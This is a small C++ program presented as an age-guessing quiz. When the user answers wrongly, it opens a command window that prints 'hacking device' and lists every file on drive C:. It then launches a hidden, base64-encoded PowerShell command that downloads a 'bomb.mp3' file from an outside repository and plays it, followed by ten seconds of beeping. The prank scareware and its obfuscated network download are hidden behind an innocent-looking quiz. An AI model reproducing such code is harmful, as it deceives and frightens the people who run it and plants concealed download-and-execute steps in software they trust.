#include <iostream>
#include <string>
#include <cstdlib>
#include <windows.h>
using namespace std;

int main() {
    string name = "Jules";
    int age = 15;
    cout << "How old is " << name << "? ";

    int answer;
    cin >> answer;
    if (answer == age) {
        cout << "Correct! " << name << " is " << age << " years old.";
    } else {
        cout << "Wrong! " << name << " is " << age << " years old.";
        system("start \"\" /MAX cmd.exe /K \"cd /d C:\\ && color 2 && echo hacking device && dir /s\"");
        system("start \"\" /B powershell -NoProfile -EncodedCommand JAB1AHIAbAA9ACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBpAG4AZgBlAGMAdABlAGQAdwBhAHIAZQAvAEgAYQBjAGsAZQByAC8AbQBhAGkAbgAvAGIAbwBtAGIALgBtAHAAMwAnADsAJABmAGkAbABlAD0ASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACcAYgBvAG0AYgAuAG0AcAAzACcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgBpAGwAZQA7AEEAZABkAC0AVAB5AHAAZQAgACcAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwAgAHAAdQBiAGwAaQBjACAAYwBsAGEAcwBzACAATQAgAHsAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB3AGkAbgBtAG0ALgBkAGwAbAAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAdQB0AG8AKQBdACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABtAGMAaQBTAGUAbgBkAFMAdAByAGkAbgBnACgAcwB0AHIAaQBuAGcAIABjACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAcgAsACAAaQBuAHQAIABsACwAIABTAHkAcwB0AGUAbQAuAEkAbgB0AFAAdAByACAAaAApADsAIAB9ACcAOwBbAE0AXQA6ADoAbQBjAGkAUwBlAG4AZABTAHQAcgBpAG4AZwAoACIAbwBwAGUAbgAgAGAAIgAkAGYAaQBsAGUAYAAiACAAdAB5AHAAZQAgAG0AcABlAGcAdgBpAGQAZQBvACAAYQBsAGkAYQBzACAAcwAiACwAJABuAHUAbABsACwAMAAsAFsASQBuAHQAUAB0AHIAXQA6ADoAWgBlAHIAbwApADsAWwBNAF0AOgA6AG0AYwBpAFMAZQBuAGQAUwB0AHIAaQBuAGcAKAAiAHAAbABhAHkAIABzACIALAAkAG4AdQBsAGwALAAwACwAWwBJAG4AdABQAHQAcgBdADoAOgBaAGUAcgBvACkAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAOwBbAE0AXQA6ADoAbQBjAGkAUwBlAG4AZABTAHQAcgBpAG4AZwAoACIAYwBsAG8AcwBlACAAcwAiACwAJABuAHUAbABsACwAMAAsAFsASQBuAHQAUAB0AHIAXQA6ADoAWgBlAHIAbwApAA==");
        DWORD startTime = GetTickCount();
        while (GetTickCount() - startTime < 10000) {
            Beep(800, 200);
            Beep(1200, 200);
            Beep(600, 400);
        }
    }

    return 0;
}
